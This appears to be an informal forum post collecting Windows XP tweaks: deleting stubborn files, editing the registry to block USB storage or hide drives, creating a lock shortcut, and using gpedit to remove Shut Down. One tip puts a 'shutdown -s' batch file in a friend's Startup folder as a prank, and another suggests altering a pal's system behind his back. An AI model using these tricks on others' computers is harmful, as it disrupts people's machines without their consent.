(the filename should have the extension of the undeletable file so it will overwrite it)

click save,

It should ask u to overwrite the existing file, choose yes and u can delete it as normal


Here's a manual way of doing it. I'll take this off once you put into your first post zain.

1. Start
2. Run
3. Type: command
4. To move into a directory type: cd c:\*** (The stars stand for your folder)
5. If you cannot access the folder because it has spaces for example Program Files or Kazaa Lite folder you have to do the following. instead of typing in the full folder name only take the first 6 letters then put a ~ and then 1 without spaces. Example: cd c:\progra~1\kazaal~1
6. Once your in the folder the non-deletable file it in type in dir - a list will come up with everything inside.
7. Now to delete the file type in del ***.bmp, txt, jpg, avi, etc... And if the file name has spaces you would use the special 1st 6 letters followed by a ~ and a 1 rule. Example: if your file name was bad file.bmp you would type once in the specific folder thorugh command, del badfil~1.bmp and your file should be gone. Make sure to type in the correct extension.

Branding Windows with your Name.

Branding Windows with your Name
open notepad dump the following lines into it and save it with the name OEMINFO.INI in the c:\windows\system32 directory:

* [General]
* Manufacturer=Your Name Here
* Model=Your Model Here
* [Support Information]
* Line1=Your Name Here
* Line2=Your Address Here
* Line3=Your Email Address Here

* Save the file, then make a right click on my computer select properties, in the general tab a button will be highlighted (support information) make a click on it, you will be able to see the changes.
* Now if you want to display some more information then simply increase the line in the file.
* ex: Line4=Your Working Hours Here.

Disable the Use of USB Storage Devices.

1. Click Start, and then click Run.
2. In the Open box, type regedit, and then click OK.
3. Locate, and then click the following registry key:
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\UsbStor
4. In the right pane, double-click Start.
5. In the Value data box, type 4, click Hexadecimal (if it is not already selected), and then click OK.(If U Want To Enable type 3)
6. Quit Registry Editor

Locking Drives.

We don’t usually prefer to lock our drives, but sometimes it becomes nesscary. Say for instance you might have stored your office documents in D:\ and you don’t want your kids to access it, in such case this technique can be useful for you. Please don’t try this tweak with your root drive (usually C:\ is the root drive) since root drives are not intended to be locked because they are mandatory for the system and application programs.

* Start & Run and type Regedit to open Registry editor
* Browse HKEY_CURRENT_USER\Software\Microsoft\Windows\Curre ntVersion\Policies\Explorer
* Create a new DWORD value NoViewOnDrive and set its value as

2^ (Alpha Number of Drive Letter-1) where Alpha number are simple counting of alphabets from A to Z as 1 - 26
For example: to lock C:\, Alpha number of C is 3 so 2^ (3-1) = 4 (decimal value)

* To lock more drives, calculate the value of each drive and then set sum of those numbers as value
* To unlock your drive just delete the key from the registry.

Prog to restart pc automatically.

prog to restart pc automatically. can also be used to fool ur friends

just follow these steps

1.open note pad

2.type "shutdown -s" with out coaches

3.save the file with .bat extension
for eg:if the file name is orkut save the file as orkut.bat

4.after saving the file close the notpad

5.tats it, u have created a prog which shutdowns the pc with in 30
of executing the file(orkut.bat)


the main part comes only now
if u want to use this to to fool ur friends
u have to do this

1.copy the file
2.open "x:\Documents and Settings\USERNAME\Start Menu\Programs\Startup\" (x->is the drive on which ur windows has been installes and USERNAME is the username)
3.paste a shortcut on this directory

TATS ALL U HAVE TO DO


WAT WILL HAPPEN IF U DO THIS?

WHEN EVER UR FRIEND STARTS HIS PC

a count down will start

after 30 sec his pc will shutdown





if u want ur friends pc to restart automatically

then u have to follow the same steps mentioned above

but u have to replace "shutdown -s" "restart _s"

to deactivate this

run command probpt
to do this. (simple procedure)
1.click start
2.click on run
3.type cmd
4.press enter.

One Click Computer Lock.

Now What u have to do is to just follow the steps to create a one-click Computer Lock shortcut on your desktop:


1. On your desktop, right-click on a blank spot and point to New, then click on Shortcut.

2- Now click BROWSE Button and then gave any Path where u want to place that shortcut. ( best place for this is Desktop)

3- Now click Next and then type any name (of ur choice) for that Icon (icon for Lock of Computer)

4- Now right-click the newly created icon and choose its Propertes (pop-up-menu)

5- Now click on Shortcut Tab

6- in Front of TARGET address bar. just copy and paste the following line

%windir%\system32\rundll32.exe user32.dll,LockWorkStation


7- Then click on OK button to exit from properties menu of that shortcut..

Disable shutdown icon from start menu.

remove shutdown from start menu and also from all other possible options.

hide shutdown from start menu

disable shutdown all togetherDisable or remove shutdown - The Ethical Hackinglearn to do it now!!!

(it takes less than a minute to do so) Disclaimer: this is an article which just brings out the fact that removing the

shut down menu option from the start menu is possible. If you however get caught

by your manager or college system administrator, and get whipped in your ass, I

cannot be held responsible. This tool is a inbuilt tool present in windows XP, just like msgconfig.

So you

got to execute this command using run.

1 . Start ->run and type gpedit.msc The gpedit stands for group policy and you can do wonders using this.

Also if you a minute with your pal’s system and this pal tries to flirt your girl friend

- You can make a lot of changes to his system in the time he leaves you alone

with his system, to have him go bonkers.


2. User configuration -> administrative Templates -> start menu and taskbar ->

3. This option opens up a pane on the right hand side. Identify the option named- Remove SHUT DOWN on the start menu .

4. Double click Remove SHUT DOWN on the start menu option

5. a small screen pops up and you may like to read about the explanation in theEXPLAIN TAB before you change the settings.

6. Just change the radio button TO ENABLED and say apply.

7. DONE. No need to log off or restart the system. (You may however have to find a way to restart your system.)

8. This option disables the log off option from the system. From the start menu,also from the life saver –

three buttons CTRL - ALT - DEL options. This option goes well with the HIDING THE LOG OFF FROM START MENU…

(To shut down ur system:-without using frm shut down menu) The solution is that u can switch user thru task manager

(alt+ctrl+del) or by pressing winkey+L where u get the option to turn off ur compy/restart/standby.


or u may create a shortcut using this shortcut location to shutdown ur sys %windir%\system32\shutdown.exe -s to restart,

u can use this shortcut %windir%\system32\shutdown.exe -r